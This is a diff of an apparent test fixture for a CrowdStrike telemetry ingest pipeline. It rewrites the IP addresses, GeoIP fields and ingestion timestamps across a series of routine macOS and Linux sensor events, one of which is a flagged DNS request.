"{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "state", "action": "LocalIpAddressRemovedIP6", @@ -2416,9 +2093,24 @@ "type": "macos" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "mac": "c2-27-b0-27-83-0f", - "address": "ff88:1:1:ffff:c027:b0ff:fe27:830f", - "ip": "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -2427,21 +2119,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.176.144.39", - "vendor": "crowdstrike", - "ip": "208.176.144.39", "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:21.723Z", "ecs": { @@ -2449,20 +2132,20 @@ }, "related": { "hosts": [ - "208.176.144.39", - "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1620585913" ], "ip": [ - "208.176.144.39", - "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465614500Z", - "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"208.176.144.39\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:c027:b0ff:fe27:830f\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150747Z", + "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.14\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.723Z", "kind": "state", "action": "LocalIpAddressIP6", @@ -2528,21 +2211,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.98.120.25", - "vendor": "crowdstrike", - "ip": "208.98.120.25", "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:07.037Z", "ecs": { @@ -2550,20 +2224,20 @@ }, "related": { "hosts": [ - "208.98.120.25", + "67.43.156.14", "0.0.0.0" ], "hash": [ "3090255842" ], "ip": [ - "208.98.120.25", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465621300Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"208.98.120.25\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150753300Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:07.086Z", "kind": "event", "action": "NetworkListenIP4", @@ -2603,21 +2277,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.31.216.39", - "vendor": "crowdstrike", - "ip": "208.31.216.39", "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:36.729Z", "file": { @@ -2631,18 +2296,18 @@ }, "related": { "hosts": [ - "208.31.216.39" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.31.216.39" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465628Z", - "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"208.31.216.39\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", + "ingested": "2021-12-09T13:36:11.150759600Z", + "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", "created": "2021-07-07T17:05:36.784Z", "kind": "event", "action": "ExecutableDeleted", @@ -2680,21 +2345,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.188.8.87", - "vendor": "crowdstrike", - "ip": "208.188.8.87", "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.542Z", "file": { @@ -2710,19 +2366,19 @@ }, "related": { "hosts": [ - "208.188.8.87" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.188.8.87" + "67.43.156.14" ] }, "event": { "action": "GzipFileWritten", - "ingested": "2021-11-22T09:23:55.465634800Z", - "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"208.188.8.87\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", + "ingested": "2021-12-09T13:36:11.150766Z", + "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", "id": "ffffffff-1111-11eb-9320-06d410e6f705", "created": "2021-07-07T17:05:04.614Z" }, @@ -2736,21 +2392,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:52:50.595Z", "os": { @@ -2761,18 +2408,18 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465641500Z", - "original": "{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150772300Z", + "original": "{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "event", "action": "IOServiceRegister", @@ -2819,21 +2466,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:02.031Z", "ecs": { @@ -2841,18 +2479,18 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465648300Z", - "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"208.165.30.176\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150778600Z", + "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.739Z", "kind": "event", "action": "PtyCreated", @@ -2879,26 +2517,8 @@ "type": "macos" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OK", - "city_name": "Tulsa", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oklahoma", - "location": { - "lon": -95.9306, - "lat": 36.0284 - } - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.27.233.142", - "ip": "208.27.233.142" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -2907,21 +2527,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.69.76.234", - "vendor": "crowdstrike", - "ip": "208.69.76.234", "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:35.967Z", "ecs": { @@ -2929,20 +2540,18 @@ }, "related": { "hosts": [ - "208.69.76.234", - "208.27.233.142" + "67.43.156.14" ], "hash": [ "1803419442" ], "ip": [ - "208.69.76.234", - "208.27.233.142" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465655100Z", - "original": "{\"LocalAddressIP4\":\"208.27.233.142\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"208.69.76.234\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150784800Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.967Z", "kind": "state", "action": "LocalIpAddressRemovedIP4", @@ -2996,21 +2605,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.144.51.215", - "vendor": "crowdstrike", - "ip": "208.144.51.215", "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:34.875Z", "ecs": { @@ -3018,20 +2618,20 @@ }, "related": { "hosts": [ - "208.144.51.215", + "67.43.156.13", "0:0:0:0:0:0:0:1" ], "hash": [ "1701000200" ], "ip": [ - "208.144.51.215", + "67.43.156.13", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465662100Z", - "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"208.144.51.215\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150791400Z", + "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.413Z", "kind": "event", "action": "NetworkCloseIP6", @@ -3057,21 +2657,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:50.580Z", "os": { @@ -3082,18 +2673,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465668800Z", - "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"208.203.151.21\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150797700Z", + "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:50.580Z", "kind": "event", "action": "ConfigStateUpdate", @@ -3142,21 +2733,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.141.219.156", - "vendor": "crowdstrike", - "ip": "208.141.219.156", "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:53.531Z", "ecs": { @@ -3164,18 +2746,18 @@ }, "related": { "hosts": [ - "208.141.219.156" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.141.219.156" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465675600Z", - "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"208.141.219.156\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", + "ingested": "2021-12-09T13:36:11.150804Z", + "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", "created": "2021-07-07T17:04:53.756Z", "kind": "alert", "action": "SuspiciousDnsRequest", @@ -3200,21 +2782,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.54.217", - "vendor": "crowdstrike", - "ip": "208.233.54.217", "serial_number": 